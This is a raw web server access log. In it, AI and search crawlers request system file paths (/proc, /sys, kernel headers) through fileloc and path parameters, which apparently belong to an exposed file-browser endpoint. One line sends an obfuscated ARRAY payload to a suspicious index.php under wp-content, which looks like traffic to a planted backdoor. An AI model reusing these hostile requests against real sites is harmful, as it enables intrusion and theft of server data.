216.73.216.50 - - [09/Nov/2025:01:13:08 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsnap%2Fcore20%2Fcurrent%2Flib%2Fpython3%2Fdist-packages%2Furllib3%2Fexceptions.py&path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Flib%2Fpython3%2Fdist-packages%2Furllib3 HTTP/1.0" 200 5047 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:08 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Flinux%2Fdecompress%2Funlzo.h&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Flinux%2Fdecompress HTTP/1.0" 200 3062 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.156.124.2 - - [09/Nov/2025:01:13:09 +0000] "GET /our-works/tvc-caltex-havoline/?path=//sys/dev/char/5:0 HTTP/1.0" 200 3305 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:13:09 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Funittest%2F__pycache__%2Fmain.cpython-38.pyc&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Funittest%2F__pycache__ HTTP/1.0" 200 2896 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:09 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fdrivers%2Fpci%2Fcontroller%2FMakefile&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fdrivers%2Fpci%2Fcontroller HTTP/1.0" 200 3721 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:13:09 +0000] "GET /q-~206t3ofwHOEfcLjky4oxPg4ZSNfviSWXq6239/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:10 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fkernel%2Firq%2FKconfig&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fkernel%2Firq HTTP/1.0" 200 4234 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:10 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Funittest%2F__pycache__%2Fsuite.cpython-38.pyc&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Funittest%2F__pycache__ HTTP/1.0" 200 2896 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:13:11 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory12/node0/cpu1/driver HTTP/1.0" 200 3414 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:11 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Flib%2Fraid6%2Ftest%2FMakefile&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Flib%2Fraid6%2Ftest HTTP/1.0" 200 4019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:11 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fusr%2Flib%2Fpython3.8%2Fdistutils%2Fcommand%2F__pycache__%2Fupload.cpython-38.pyc&path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fusr%2Flib%2Fpython3.8%2Fdistutils%2Fcommand%2F__pycache__ HTTP/1.0" 200 2914 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:13:12 +0000] "GET /q-~191yeLCxrxMdYEXG0bmXczxnppiFsa9MV40474/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:12 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216-generic%2Finclude%2Fdt-bindings%2Freset-controller HTTP/1.0" 200 3223 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:12 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Fplugins%2Ftwisted_ftp.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Fplugins HTTP/1.0" 200 3006 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:13:13 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory12/node0/memory2 HTTP/1.0" 200 3612 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:13 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Frunner%2Finetd.py&path=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Frunner HTTP/1.0" 200 3710 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:13 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Fcryptography%2F__init__.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Fcryptography HTTP/1.0" 200 3133 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
44.206.65.8 - - [09/Nov/2025:01:13:13 +0000] "GET /our-works/tvc-relax-gaba/?path=//sys/firmware/memmap/3 HTTP/1.0" 200 3236 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:13:13 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Ftools%2Fperf%2FDocumentation%2FMakefile&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Ftools%2Fperf%2FDocumentation HTTP/1.0" 200 6275 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:13:14 +0000] "GET /q-~205stObTpy9PmQM4iGvIwtGIKOtkXz8AM8314/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:14 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Ftools%2Ftesting%2Fselftests%2Fnet%2Fl2tp.sh&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Ftools%2Ftesting%2Fselftests%2Fnet HTTP/1.0" 200 5060 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:14 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Flibraries%2Fclasses%2FControllers%2FDatabase%2FStructure%2FCentralColumns HTTP/1.0" 200 3357 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:14 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fscripts%2Fkconfig%2Fqconf.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fscripts%2Fkconfig HTTP/1.0" 200 5008 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:13:15 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory12/node0/memory6 HTTP/1.0" 200 3613 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:15 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fscripts%2Fdtc%2Finclude-prefixes%2Fdt-bindings%2Fclk HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:13:15 +0000] "GET /q-~33JfsHDVoyNBS6Hd7qQO3JkXtTaYPvEs31808/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:15 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Flinux%2Fdecompress%2Fmm.h&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Flinux%2Fdecompress HTTP/1.0" 200 3752 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:16 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2FDistUpgrade%2FDistUpgradeApport.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2FDistUpgrade HTTP/1.0" 200 4542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:16 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fdrivers%2Fnet%2Fwireless%2Fintel%2FKconfig&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fdrivers%2Fnet%2Fwireless%2Fintel HTTP/1.0" 200 3205 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:16 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fmips%2Finclude%2Fasm%2Fsn%2Fsn_private.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fmips%2Finclude%2Fasm%2Fsn HTTP/1.0" 200 3156 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.211.105.134 - - [09/Nov/2025:01:13:17 +0000] "GET /our-works/phim-viral-ila/?fileloc=//usr/bin/loginctl&path=//usr/bin HTTP/1.0" 200 2823 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:13:17 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fshare%2Fdoc%2Fpython3-launchpadlib%2Fdocs%2FMakefile&path=%2F%2Fusr%2Fshare%2Fdoc%2Fpython3-launchpadlib%2Fdocs HTTP/1.0" 200 3182 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:13:17 +0000] "GET /q-~76fmrNmEI1nykjVSGmtqFgMH5hqRPN0Q22569/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:13:17 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory12/node0/cpu0 HTTP/1.0" 200 3649 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:18 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fscripts%2Fcoccinelle%2Fmisc%2Fwarn.cocci&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fscripts%2Fcoccinelle%2Fmisc HTTP/1.0" 200 3410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:18 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Ftools%2Ftesting%2Fselftests%2Fbpf%2Ftest_tunnel.sh&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Ftools%2Ftesting%2Fselftests%2Fbpf HTTP/1.0" 200 6201 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:18 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Fimportlib%2F__pycache__%2F_bootstrap_external.cpython-38.pyc&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Fimportlib%2F__pycache__ HTTP/1.0" 200 2906 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:18 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Flibraries%2Fclasses%2FEngines%2FNdbcluster.php&path=%2F%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Flibraries%2Fclasses%2FEngines HTTP/1.0" 200 3240 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:13:19 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory13/node0/memory0 HTTP/1.0" 200 3610 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:13:19 +0000] "GET /q-~170nRNcio82gLtDKAvTvQOBMgIEcKIZsc22193/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:19 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fvar%2Flib%2Fpython%2Fpython3.8_installed&path=%2F%2Fproc%2Fself%2Froot%2Fvar%2Flib%2Fpython HTTP/1.0" 200 2866 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:20 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fscripts%2Fkconfig%2FMakefile&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fscripts%2Fkconfig HTTP/1.0" 200 5107 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:20 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fnds32%2Finclude%2Fasm%2Firqflags.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fnds32%2Finclude%2Fasm HTTP/1.0" 200 3191 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:20 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fptyprocess%2F_fork_pty.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fptyprocess HTTP/1.0" 200 3818 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
100.24.167.60 - - [09/Nov/2025:01:13:20 +0000] "GET /our-works/tvc-sjc/?fileloc=//usr/bin/diff3&path=//usr/bin HTTP/1.0" 200 2821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:13:21 +0000] "GET /q-~296E7hhiQDKFJZLd3JCAIcSkoJ5bIGdDB2717/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:13:21 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory14/node0/memory9 HTTP/1.0" 200 3613 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:21 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.9%2Fdistutils%2Fmsvc9compiler.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.9%2Fdistutils HTTP/1.0" 200 11622 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:21 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.9%2Fdistutils%2Fdep_util.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.9%2Fdistutils HTTP/1.0" 200 4164 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:22 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fscripts%2Fselinux%2Fgenheaders%2FMakefile&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fscripts%2Fselinux%2Fgenheaders HTTP/1.0" 200 2996 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:22 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Farch%2Fc6x%2Finclude%2Fasm%2Fcmpxchg.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Farch%2Fc6x%2Finclude%2Fasm HTTP/1.0" 200 3498 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:13:23 +0000] "GET /q-~286hn8tvYPt4BZuNvWLtNujGRCscdGedH37097/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:24 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Fdistutils%2Fcommand%2Finstall.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Fdistutils%2Fcommand HTTP/1.0" 200 10184 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:24 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fshare%2Fdoc%2Fpython3-zope.interface%2Fchangelog.Debian.gz&path=%2F%2Fusr%2Fshare%2Fdoc%2Fpython3-zope.interface HTTP/1.0" 200 2864 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:25 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Ftools%2Ftesting%2Fselftests%2Fnet%2Fpmtu.sh&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Ftools%2Ftesting%2Fselftests%2Fnet HTTP/1.0" 200 12549 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:25 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Ftools%2Ftesting%2Fktest%2Fktest.pl&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Ftools%2Ftesting%2Fktest HTTP/1.0" 200 31646 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.248.20 - - [09/Nov/2025:01:11:04 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635343236342p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323635303636342q3165663838373338666634363638666462643062633732343534643336333338222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
74.7.227.189 - - [09/Nov/2025:01:13:25 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory12/node0/memory8 HTTP/1.0" 200 3613 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.204.62.163 - - [09/Nov/2025:01:13:27 +0000] "GET /our-works/tvc-caltex-havoline/?path=//sys/kernel/slab/ip_mrt_cache HTTP/1.0" 200 4243 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:13:27 +0000] "GET /q-~204oDCpolk6yS8dJhDpbtXIwtSyFNXIQV13547/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:28 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.9%2Fdistutils%2Fcygwinccompiler.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.9%2Fdistutils HTTP/1.0" 200 8166 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:28 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.9%2Fdistutils%2Fmsvccompiler.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.9%2Fdistutils HTTP/1.0" 200 9429 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:28 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fsoftwareproperties%2F__pycache__%2Fshortcuts.cpython-38.pyc&path=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fsoftwareproperties%2F__pycache__ HTTP/1.0" 200 2893 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:29 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fscripts%2Fkconfig%2Fsymbol.c&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fscripts%2Fkconfig HTTP/1.0" 200 10210 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
